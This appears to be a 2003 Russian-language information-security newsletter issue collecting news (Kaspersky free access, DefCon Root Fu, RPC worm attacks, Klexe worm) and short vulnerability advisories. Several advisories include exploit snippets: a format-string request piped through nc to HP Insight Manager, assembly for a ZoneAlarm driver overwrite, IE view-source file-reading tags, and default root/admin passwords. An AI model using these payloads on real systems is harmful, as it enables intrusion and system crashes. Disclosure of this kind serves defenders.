Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Бесплатный доступ к web-сайту "Лаборатории Касперского" - реальность для любого пользователя сети
6 августа | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. антивирус КасперскийУчастие компании в проекте WWW Open обеспечит любого пользователя Рунета свободным доступом к web-сайту "Лаборатории Касперского"
Программа WWW Open - это совместный проект ЗАО "Открытые Коммуникации" совместно с ОАО "Центральный телеграф", представленный летом 2003 года. В рамках проекта всем пользователям интернет круглосуточно предоставляется бесплатный канал доступа к популярным ресурсам сети по коммутируемым линиям связи (dial-up). Этот сервис ориентирован на активных пользователей, заинтересованных в неограниченном оперативном доступе к торговым и информационно-справочным сайтам в интернете.
Учитывая популярность Антивируса Касперского, а также огромное число ежедневных обращений к web-сайту компании, "Лаборатория Касперского" стала одним из первых участников WWW Open. Участие компании в данном проекте дает широкий ряд возможностей любому пользователю, нуждающемуся в оперативной защите своего компьютера от вредоносных программ, но не располагающему возможностью оплаты услуг провайдера интернет-доступа.
При помощи бесплатного коммутируемого соединения в любой момент времени можно загрузить последнее обновление антивирусной базы данных Антивируса Касперского, демо-версии антивирусных продуктов "Лаборатории Касперского" или обратиться по электронной почте в круглосуточную службу технической поддержки компании. Все, что нужно для этого пользователю - корректно настроить модемное соединение.
Ознакомиться с детальной информацией о проекте WWW Open, перечнем
компаний-участников проекта, а также установить параметры коммутируемого
соединения компьютера можно по адресу http://list.openwww.ru.
Хакерский конкурс поможет кибербезопасности
6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны хакер вирус Технологии безопасности. Организации разработчики, интеграторы.Боевая подготовка является частью игры известной, как Root Fu. Ежегодные соревнования проходят в рамках конференции DefCon. Восемь команд проходят проверку на способность обороняться от кибератак и хакерский талант. Каждая группа должна защитить собственный сервер и приложения, в то же время попытаться взломать серверы других участников.
«Подобный вид состязаний ясно показывает недостатки и достоинства в сфере компьютерной безопасности», - объясняет Криспин Кауэн, руководитель исследовательских работ компании Immunix. – «Мы дорожим данными соревнованиями потому, как они более объективно оценивают безопасность, нежели какие-либо общие критерии».
Безусловно, такие комментарии вступают в чрезвычайный конфликт с мнением представителей верховной власти США. Чиновники по-прежнему рассматривают хакеров, как угрозу.
Законы - Digital Millennium Copyright Act и Cybersecurity Enhancement Act – облагают взломщиков жесткими взысканиями и наказаниями. Однако мудрые эксперты рассматривают соревнования Root Fu, как важный и необходимый способ улучшения безопасности.
Каждая команда руководит 5 веб-сервисами. Среди них, музыкальное приложение, новостной портал, 2 рекламных и многопользовательская ролевая игра FurryMuck.. Очки присваиваются за доступность приложений. Чем дольше продержится сервис, тем больше баллов и шансов у команды на победу.
Инженер по безопасности Алан Харпер из Агентства по защите информационных систем считает, что состязания, как Root Fu, помогают другим понять, что не все хакерство плохое. «Это понимание кроется в этике взломщиков. Техника может быть одинакова, но намерения разными. Это не то, что мы должны скрывать».
Root Fu возможно вновь всколыхнет длительные дебаты о том, могут ли хакеры быть лучшими защитниками. «Агрессивные вторжения проводят хорошую ревизию программ. Они атакуют, находят дыры и сообщают о них защитникам команды», - отмечает г-н Кауэн.
Как свидетельствует BusinessWeek Online , опыт показывает, что знания о том, как атаковать системы являются решающими в совершенствовании защиты.
Хотя многие полагают, что взломщикам верить нельзя, Криспин Кауэн подчеркивает, что все зависит от этики. «Орудия хакеров должны быть легальными. Однако если я использую их для взлома вашего компьютера, тогда я могу считаться преступником».
1Хакеры США и Китая не знают предела
6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны хакер вирусВ первой половине текущего года компания
Иностранные аналитики даже не берутся подсчитать в денежном эквиваленте потери, вызванные всеми атаками. Наташа Дэвид, старший аналитик компании International Data, заявляет, что произвести оценку ущерба практически невозможно. Основной причиной является сложность оценки ущерба от потери конфиденциальной информации и простоя корпоративных информационных систем.
Наиболее активными в
Сингапур является региональным лидером
Хакеры, как правило, оснащены по последнему слову техники. Многие из них превосходно разбираются в психологии, что позволяет им заниматься социальным инжинирингом. Суть этого метода в том, что хакер с помощью телефонных или иных переговоров может получить ценную информацию от ничего не подозревающих сотрудников компании. Впоследствии полученная информация используется для того, чтобы проникнуть на компьютеры атакуемой компании.
Многие специалисты из
Помимо Сингапура, активность проявляют хакеры из Кореи — 9%. Следом за
Кореей идут Япония (6%) и Малайзия (3%). Корея попадает в пятерку
стран, начиная с марта 2003 г. В прошлом году эта страна ни разу
не попадала в список
В США арестован серийный хакер
6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны хакер24-летнему аспиранту Университета Мичигана (University of Michigan) удалось с помощью чужих паролей проникнуть в университетскую компьютерную сеть и добыть там задания и ответы для заключительного экзамена – и это лишь одно из преступлений, в которых он обвиняется. На совести молодого хакера, которого пресса сразу же окрестила «серийным», – кража номеров кредитных карт и рассылка сообщений электронной почты от имени других адресатов.
Нин Ма (Ning Ma), 24-летний аспирант из Китая, находится в США по студенческой визе. В Университете Мичигана он изучает финансовый инжиниринг. На прошлой неделе Нин Ма был арестован по обвинению в 23 киберпреступлениях, жертвами которых стали 60 человек. После предъявления обвинения суд назначил залог за освобождение в размере $100 тыс.
С августа 2002 года по апрель этого года Нин Ма получал доступ к чужой электронной почте и личным файлам других пользователей университетской сети, утверждает обвинение. Логины и пароли преподавателей и студентов он узнавал, используя специальную программу, которая фиксирует каждое нажатие клавиши другими пользователями.
Как заявило обвинение, Нин Ма отправил с адреса одного из преподавателей письмо студентке, в котором говорилось, что она очень отстает по его предмету, и предлагалось репетиторство в обмен на услуги интимного характера. Китайский аспирант отменил также визит одного из студентов на собеседование для приема на работу и узнал номер кредитной карты, банковского счета и пин-код другого студента. Кроме того, в университетской сети он проник в личные хранилища данных двух преподавателей, где и находились экзаменационные задания и ответы к ним.
В целом Нин Ма обвиняют в 16 случаях неавторизованного доступа к компьютеру, компьютерной системе или сети, 4 случаях перехвата информации, а также в незаконном владении устройством для извлечения информации и использовании компьютера для совершения преступления. Если китайского аспиранта признают виновным, ему грозит до 5 лет лишения свободы.
3Windows официально признали небезопасной
6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны дыра уязвимостьДолгие споры вокруг использования Windows-систем воплотились в официальный вердикт американских властей: продукт от Microsoft небезопасен.
Такое заключение сделали на днях представители Департамента внутренней безопасности при правительстве США. Поводом к такому резонансному заявлению стал факт недавней атаки на несколько сетей, пребывающих в государственном подчинении.
Все они работали под Windows и не сумели устоять под давлением RPC-атаки. И хотя на сегодня атака уже локализована, Департамент не исключает возможности дальнейшего ее распространения, сообщает CNN.
4Атака на Беркли
6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны дыра вирусная атакаПосле обнародования информации об уязвимости в реализации RPC в Windows, первые цветочки не заставили себя долго ждать. По оценке администрации сети университета Беркли, уже от 50 до 100 машин в кампусе были успешно атакованы с ее помощью. Учтя тот факт, что из 40 тысяч машин, входящих в сеть, примерно половина использует Windows (хотя, конечно весьма сомнительно что бы NT-системы составляют там большинство), пропатчено минимальное количество, и снаружи приходит до тысячи попыток сканирования ежедневно, администрация приняла радикальное решение - отрезать всю сеть от внешнего мира на четыре дня и провести за это время глобальную чистку. (Источник: www.bugtraq.ru) 5
Klexe - почтовый вирус и троян в одном флаконе
6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны вирус вирусная атакаКомпания Panda Software предупреждает о появлении нового многофункционального червя Klexe. Он состоит из двух компонентов: первый обеспечивает его распространение по электронной почте, а второй выполняет функции трояна, похищая данные с пораженного компьютера. компьютере жертвы трояна, который похищает конфиденциальную информацию пользователя и отправляет ее на специальный адрес электронной почты. Процесс заражения происходит следующим образом: на электронный почтовый ящик пользователя приходит письмо со ссылкой на веб-страницу, где ему предлагается скачать карту e-Messenger; после открытия данной страницы на компьютер пользователя загружаются два файла с различными компонентами червя. При попадании червя на компьютер пользователя, он обеспечивает свой автозапуск, затем на экране появляется сообщение об ошибке, после чего Klexe рассылает копию зараженного письма по всем адресам, найденным в адресной книге Outlook. 6
Англичане не прочь превратиться в нацию киберищеек
6 августа | Рубрика: Информационая безопасность общественной коммуникации, личности.Согласно опросу, спонсируемому Symantec, четверь британских мужчин и 13% женщин с удовольствием бы покопались в компьютере своих боссов на предмет определения размера зарплаты своих сослуживцев. Примерно таково же число желающих ознакомиться с корпоративными планами и финансовой информации.
Ну а когда дело доходит до родных и близких, все становится еще веселее - 40 процентов женщин готовы читать электронную почту своего благоверного, а оставшиеся 60 были бы готовы просматривать сообщения при возникновении подозрений в неверности. У мужчин соответствующие значения - четверть и треть, а 35 процентов готовы делать это в случае уверенности, что их не застукают.
7В Сети появился живой хит-парад самых страшных «дыр»
6 августа | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны дыра уязвимостьКомпания Qualys, занимающаяся вопросами безопасности в интернете, опубликовала список самых незащищенных звеньев Сети, которыми чаще всего пользуются хакеры для совершения своих атак. Список динамический – он создается в режиме реального времени при помощи сканирования огромного количества участков Сети.
Компьютерные вандалы используют бреши в программах, чтобы заполучить контроль над машинами и затем использовать их для запуска в интернет вирусов и червей. В последние годы эта проблема превратилась в головную боль специалистов по защите сетей. Создатели списка пытаются вычислить, каким «дырам» хакеры уделяют больше всего внимания в данный момент.
Рейтинг уязвимостей обновляется ежедневно, каждую неделю база данных Qualys пополняется 25 новыми «дырами». В создании списка проблем и путей их решения принимают участие такие организации, как Incidents.org, команда срочных компьютерных вызовов Cert, а также Bugtraq.
Рейтинг самых опасных дыр - The
RV10 на 6 августа выглядит следующим образом:
Title | CVE ID | Qualys ID |
Microsoft IIS CGI Filename Decode Error Vulnerability | CVE-2001-0333 | 86140 |
Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability | CVE-2001-0500 | 86170 |
Microsoft IIS Malformed HTR Request Buffer Overflow Vulnerability | CVE-2002-0071 | 10577 |
Apache Chunked-Encoding Memory Corruption Vulnerability | CVE-2002-0392 | 86352 |
ISC BIND SIG Cached Resource Record Buffer Overflow (sigrec bug) Vulnerability | CAN-2002-1219 | 15030 |
Microsoft Windows 2000 IIS WebDAV Buffer Overflow Vulnerability | CAN-2003-0109 | 86479 |
Sendmail Address Prescan Possible Memory Corruption Vulnerability | CAN-2003-0161 | 74136 |
Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability | CAN-2003-0352 | 68518 |
SSL Server Has SSLv2 Enabled Vulnerability | No CVE assigned | 38139 |
Writeable SNMP Information | No CVE assigned | 78031 |
Wi-Fi: один пользователь может замедлить работу всего "хот-спота"
6 августа | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны дыраГруппа французских ученых сообщила на днях об обнаружении уязвимости в технологии беспроводных локальных сетей, позволяющей одному пользователю с невысокой скоростью доступа к сети снижать скорость подключения всех остальных пользователей "хот-спота". Четверо специалистов из Centre Nationale de la Recherche Scientifique (CNRS) в Париже собщили в своем докладе, что отклонения в стандарте IEEE 802.1x, включающем спецификации 802.11a, 802.11g и 802.11b, могут привести к ухудшению пропускной способности "хот-спота".
Специалисты приводят пример, когда несколько пользователей со скоростью подключения 11 Мб/сек благодаря близости от точки подключения замечают, что этот показатель начинает резко падать после подключения единственного далеко расположенного пользователя. Недостаток проявляется в протоколе доступа CSMA/CA (Carrier Sense Multiple Access/Avoidance Collision), который должен обеспечивать равноценный доступ к точке подключения для всех устройств.
Несмотря на значительно падение скорости, недостаток может не быть замечен пользователями, особенно при нересурсоемких поцедурах вроде просмотра веб-страниц. Однако достаточно лишь одному из пользователей начать загрузку файла или осуществление доступа к аудио или видео через беспроводное подключение, как проблема даст о себе знать.
9Изменение представления форума в Invision Power Board
6 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость в проверке правильности ввода обнаружена в Invision Power Board. Удаленный авторизованный пользователь может послать сообщение, которое изменит вид форума и потенциально изменит URL ссылки в форуме.
Программное обеспечение должным образом не обрабатывает перекрывающиеся IBF тэги (например '[QUOTE]', '[IMG]'). В результате удаленный авторизованный пользователь может перекрыть QUOTE тэг с IMG тэгом таким образом, чтобы закрыть нераскрытую кавычку. В результате удаленный авторизованный пользователь может изменить представление форума. Пример:
[IMG]http://[target]/some.gif[QUOTE]some.gif[/IMG][/QUOTE]
10Удаленное выполнение произвольного кода в HP/Compaq Insight Manager
6 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость обнаружена в HP/Compaq Insight Manager. Удаленный пользователь может выполнить произвольный код на системе.
Уязвимость форматной строки обнаружена в DebugSearchPaths HTTP запросе. Удаленный атакующий может выполнить произвольный код с LocalSystem привилегиями. Пример:
$ printf "GET /<\x21.DebugSearchPaths>?Url=perl -e 'print "A"x14'BBBBperl -e 'print ".%%x"x1208'%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301
Уязвимость обнаружена в Compaq Insight Manager 5.00 H
Способов устранения обнаруженной уязвимости не существует в настоящее время.
11Уязвимость в view-source: протоколе в Microsoft Internet Explorer
6 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость обнаружена при в Microsoft Internet Explorer при открытии pop up окон с помощью notepad. Злонамеренная Web страница или email или может отобразить pop up окно независимо от настроек безопасности и открыть произвольный файл на целевой системе пользователя, чтобы нарушить стабильность работы системы.
Pop up окно отображается в IE используя "view-source:"протокол. Протокол берет в качестве параметра URL сайта и отображает в исходный HTML код URL в утилите Notepad. Например, чтобы просмотреть исходный HTML код SecurityLab.ru, кликните на следующую ссылку:
view-source протокол также работает с файлами на локальном жестком диске. Например следующий URL отобразит boot.ini файл в c:\ каталоге.
view-source:file:///c:\boot.ini
В internet Explorer, view-source может использоваться в практически любом HTML тэге, который работает с URL. Например, следующий тэг [IMG] автоматически откроет Notepad окно в HTML email сообщении или в Web странице:
<img src=view-source:http://www.computerbytesman.com/security/npexample.txt>В результате возможны следующие побочные эффекты view-source метода, разрешенного во всех HTML тэгах:
- Notepad окно будет открыто автоматически в HTML почтовом сообщении, даже если отключено использование сценариев.
- Большинство программ блокирования popup окон не в состоянии заблокировать notepad окна.
- Простое почтовое HTML сообщение или Web-страница могут легко открыть тысячи окон, что может повлиять на стабильность работы системы. Например, единственный тэг [IMG] может открыть для редактирования в notepad системный файл c:\windows\system32\shell32.dll, используя 20 Мб системной памяти. 100 [IMG] тэгов будут потреблять 2 Gb виртуальной памяти
- Работа Windows системы может нарушиться, если пользователь случайно изменяет содержание системного файла в notepad окне и затем записывает его.
Способов устранения обнаруженной уязвимости не существует в настоящее время.
12Выполнение произвольного кода в ZoneAlarm
6 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость обнаружена в драйвере устройства в ZoneAlarm. Атакующий может получить полный контроль над уязвимой системой.
Посылая специально обработанное форматированное сообщение к ZoneAlarm Device Driver (VSDATANT - TrueVector Device Driver), атакующий может перезаписать часть памяти драйвера устройства. В результате атакующий может выполнить произвольный код на системе:
Первый сигнал должен быть послан, чтобы перезаписать определенный участок памяти, в нашем случае, этом может быть один из операторов условного перехода:
push 0 ;overlapped push offset bytes_returned ;bytes returned push 4 ;lpOutBuffer size push STATMENT_INSTRUCTION_POINTER ;memory to overwrite push 0 ;lpInBuffer size push 0 ;lpInBuffer push 8400000fh ;guess what X-D push vsdatant_handle ;device handle call DeviceIoControl ;send it!Правильный STATMENT_INSTRUCTION_POINTER должен перезаписать адрес к 00060001h (например). После распределения памяти в этом адресе (вставка shellcode bla bla bla), второй сигнал должен быть послан, чтобы внедриться во вставленный код. Это может быть сделано посылкой другого сигнала:
LpInBuffer: db STATMENT_OVERWRITTEN_NUMBER ;where to jump db 7 dup (0) ;data? dd temp_buff ;temp buffer db 10 dup (0) ;some spaceПосле посылки второго фальшивого сообщения, драйвер устройства перейдет к STATEMENT оффсету, который был перезаписан первым "сигналом". В результате атакующий может получить выполнить произвольный код с SYSTEM привилегиями.
Уязвимость обнаружена в Local ZoneAlarm Firewall все версии (проверено на 3.1)
Способов устранения обнаруженной уязвимости не существует в настоящее время.
13Уязвимость состояния операции в функции psig() в Sun Solaris
6 августа | Рубрика: Дыры и патчи программ и операционных средОтказ в обслуживании обнаружен в Sun Solaris. Локальный пользователь может аварийно завершить работу системы.
Уязвимость состояния операции обнаружена в функции psig(). Локальный пользователь может установить переменную lwp_cursig к нулю и proc.p_sig к ненулевому значению, чтобы нарушить работу систмемы.
В уязвимых системах, файлы регистрации содержат запись "BAD TRAP: type=31".
Уязвимость обнаружена в Solaris 2.6, 7, 8, and 9
Информацию о заплатах см. в источнике сообщения.
14Отказ в обслуживании в NAT в Netfilter
6 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость обнаружена в NAT выполнении в Netfilter. Удаленный пользователь может аварийно завершить работу целевой системы.
Удаленный пользователь может послать FTP и IRC пакеты, чтобы аварийно завершить работу системы.
Уязвимость может эксплуатироваться, если ядро конфигурировано с CONFIG_IP_NF_NAT_FTP или CONFIG_IP_NF_NAT_IRC параметрами или если ip_nat_ftp or ip_nat_irc модули загружены и FTP и IRC службы не фильтруются.
Уязвимость обнаружена в Linux 2.4.20 – 2.5.x
15Учетная запись по умолчанию в Enceladus Server Suite
6 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость в конфигурации по умолчанию обнаружена в Enceladus Server Suite. Пользователь по умолчанию доступен удаленному пользователю.
Система по умолчанию создает привилегированную учетную запись с именем “root” и паролем “root”.
Уязвимость обнаружена в Enceladus Server Suite 3.9
Способов устранения обнаруженной уязвимости не существует в настоящее время.
16Ракрытие пароля локальному пользователю в bjServer
6 августа | Рубрика: Дыры и патчи программ и операционных средУязвимость раскрытия пароля обнаружена в bjServer ( BajieServer ). Локальный пользователь может просмотреть пароль администратора.
Программа хранит пароли администратора в открытом виде в 'config/users.properties' файле.
Также сообщается, что имя пользователя/пароль по умолчанию – admin/admin.
Способов устранения обнаруженной уязвимости не существует в настоящее время.
17Эти и другие новости читайте на сайте Стра.тег
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||